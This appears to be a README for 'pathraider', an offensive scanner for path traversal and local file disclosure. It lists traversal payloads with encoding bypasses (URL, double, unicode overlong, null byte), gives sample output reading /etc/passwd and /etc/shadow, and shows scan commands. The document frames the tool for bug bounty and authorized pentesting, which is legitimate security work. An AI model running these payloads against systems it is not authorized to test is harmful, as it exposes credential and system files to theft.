Offensive LFD and Directory Traversal scanner
Detects Local File Disclosure and Directory Traversal vulnerabilities with automatic encoding bypass (URL, double URL, Unicode, null byte). Built for bug bounty triage and web pentesting.
πͺπΈ VersiΓ³n en espaΓ±ol
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β β
β βββββββ βββββββ βββββββββββ βββ β
β ββββββββββββββββ βββββββββββ βββ β
β ββββββββββββββββββββββ ββββββββ β
β βββββββ ββββββββββββββ ββββββββ β
β βββ ββββββββββββββββββββ βββ β
β βββ βββββββ βββββββββββ βββ β
β β
β βββββββ βββββββ βββ ββββββ βββββββ β
β βββββββββββββββββββββββββββββββββββ β
β ββββββββββββββββββββββ βββββββββ β
β βββββββ ββββββββββββββ βββββββββ β
β βββ βββ ββββββββββββββββββββββ β
β βββ βββ ββββββ ββββββ βββββββ β
β β
β LFD & Directory Traversal scanner v1.1.0 β
β encodings: plain Β· %2e Β· double Β· unicode Β· null β
β by theoffsecgirl β
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
Checks whether a web application parameter allows reading local system files (LFD / Path Traversal). Automatically generates encoding variants to bypass filters and WAFs.
- Single target (
--url) or multiple from file (--list) - Injection via
FUZZmarker or configurable parameter (--param) - 132 test paths auto-generated from 12 base paths with encodings:
- Plain,
%2e%2e%2f, double encoding,..%2f, backslash,..%5c, unicode overlong,%c0%ae, null byte
- Plain,
- Heuristic detection of sensitive content (
/etc/passwd,win.ini, etc.) - Concurrent scanning with threads
- JSON export
pathraider automatically tries multiple encoding variants per payload:
| Technique | Example |
|---|---|
| Plain | ../../../etc/passwd |
| URL encoded | %2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd |
| Double URL encoded | %252e%252e%252f |
| Unicode | ..%c0%af..%c0%af |
| Null byte | ../../../etc/passwd%00.jpg |
| Mixed | ....//....//etc/passwd |
[*] Target: https://example.com/download?file=
[*] Payloads: 180 | Encodings: 6 variants each
[!] LFI found β https://example.com/download?file=../../../../etc/passwd
Payload: ../../../../etc/passwd
Encoding: plain
Match: root:x:0:0
[!] LFI found β https://example.com/download?file=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fshadow
Payload: ../../../../etc/shadow
Encoding: url-encoded
Match: root:$6$
[+] Vulnerabilities found: 2
[+] Results saved β results.json
[*] Scan completed in 3.2s
- Parameter takes a filename or path (
?file=,?path=,?doc=,?template=) - File download endpoints
- PDF/image generators that fetch local files
- Any endpoint that reads from the filesystem
git clone https://github.com/theoffsecgirl/pathraider.git
cd pathraider
pip install -e .
pathraider --help# Scan with FUZZ marker
pathraider -u "https://example.com/download.php?file=FUZZ"
# With parameter
pathraider -u "https://example.com/get.php" -p file
# List of targets
pathraider -L scope.txt -T 20
# Export JSON
pathraider -L scope.txt --json-output results.json
# Show version
pathraider --version-u, --url Target URL (can contain FUZZ)
-L, --list File with list of targets
--paths Custom traversal paths
-p, --param Parameter without FUZZ (default: file)
-t, --timeout Timeout per request (default: 5)
-T, --threads Threads per target (default: 10)
-A, --agent Custom User-Agent
--insecure Disable TLS verification
--json-output Save results to JSON
-v, --verbose More output
--version Show version
# Quick test on a specific parameter
pathraider -u 'https://target.com/download?file=test'
# With custom depth and timeout
pathraider -u 'https://target.com/file?path=test' -d 10 -t 15
# Export to JSON for report
pathraider -u 'https://target.com/doc?name=test' --json-output findings.json
# Scan a list of targets from file
pathraider -L urls.txt -T 20 --json-output findings.jsonPRs welcome. Especially interested in:
- New encoding bypass variants
- False positive reduction
- New file targets (Windows paths, cloud metadata endpoints)
For bug bounty, labs and authorized audits only.
MIT Β· theoffsecgirl